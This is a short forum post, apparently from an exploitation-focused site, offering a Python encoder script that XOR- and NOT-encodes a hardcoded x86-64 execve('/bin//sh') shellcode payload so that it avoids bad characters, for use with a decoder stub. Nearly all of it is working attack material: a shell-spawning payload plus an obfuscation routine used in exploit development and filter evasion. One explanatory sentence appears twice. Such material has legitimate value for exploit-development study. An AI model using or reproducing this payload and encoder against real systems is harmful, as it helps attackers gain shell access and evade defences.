This is the encoder script for the decoder stub in https://www.postexplo.com/forum/prog...r-stub-example
It is pretty simple and does not guarantee bad chars are not present after encoding. You have to pick a decent value while XORing and manually verify the result.
It is pretty simple and does not guarantee bad chars are not present after encoding. You have to pick a decent value while XORing and manually verify the result.
Code:
#!/usr/bin/python shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05") # Shellcode to encode encoded = "" encoded2 = "" for x in bytearray(shellcode) : # Encoding y = x^0xAA # XOR with a proper value to avoid whatever bad chars you cannot use z = ~y # NOT encoded += '\\x' encoded += '%02x' % (z & 0xff) encoded2 += '0x' encoded2 += '%02x,' % (z & 0xff) print encoded print encoded2 print 'Len: %d' % len(bytearray(shellcode))